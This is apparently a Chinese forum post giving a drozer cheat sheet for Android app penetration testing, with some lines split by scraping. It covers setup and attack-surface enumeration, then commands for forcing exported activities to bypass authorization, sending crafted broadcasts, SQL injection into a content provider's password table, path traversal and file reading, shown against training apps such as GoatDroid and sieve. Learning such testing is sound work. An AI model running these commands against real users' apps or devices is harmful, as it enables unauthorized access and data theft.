需要注意一下要把安装路径改到python2.7,因为只有python2.7的环境才可以运行drozer
2. 安装到安卓机,结束-adb install agent.apk
adb install agent.apk
pip install protobuf
pip install pyOpenSSL
pip install service_identity
pip install twisted
adb forward tcp:31415 tcp:31415
drozer.bat console connect
列出可用模块list
list
列出设备中安装的app run app.package.list
run app.package.list
列出包含关键字的apprun app.package.list -f 关键字
run app.package.list -f 关键字
查看apk基本信息run app.package.info -a apk包名
run app.package.info -a apk包名
搜索攻击面run app.package.attacksurface 要查询的apk包名
run app.package.attacksurface 要查询的apk包名
查询activity信息 run app.activity.info -a apk包名
run app.activity.info -a apk包名
查询broadcast信息 run app.broadcast.info -a apk包名
run app.broadcast.info -a apk包名
查询provider信息run app.provider.info -a apk包名
run app.provider.info -a apk包名
越权
# 搜索可导出活动的activity名
run app.activity.info
-
a <包名>
# 尝试强制调用activity造成越权
run app.activity.start
component <包名> <aciticity名>
# 查询可导出组件信息
run app.broadcast.info
a org.owasp.goatdroid.fourgoats
# 构造恶意广播
run app.broadcast.send
action <广播名>
extra string <name> <value>
# run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --extra string phoneNumber 1234 --extra string message dog
# 查找内容提供者的路径,看有没有能query的
run scanner.provider.finduris
# query
run app.provider.query uri
# 列出apk的数据库信息
run scanner.provider.sqltables
# 搜索注入点
run scanner.provider.injection
# 构造sql语句注入
run app.provider.query content:
/
com.mwr.example.sieve.DBContentProvider
Passwords
projection
"sql语句"
run scanner.provider.traversal
# 读文件
run app.provider.read <路径[content:
开头]>
# 下载文件
run app.provider.download <路径[content:
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
nszy007 python2已经放弃了,记得几年前论坛里有位大佬分享一个支持python3的库,后来我都是用的那个。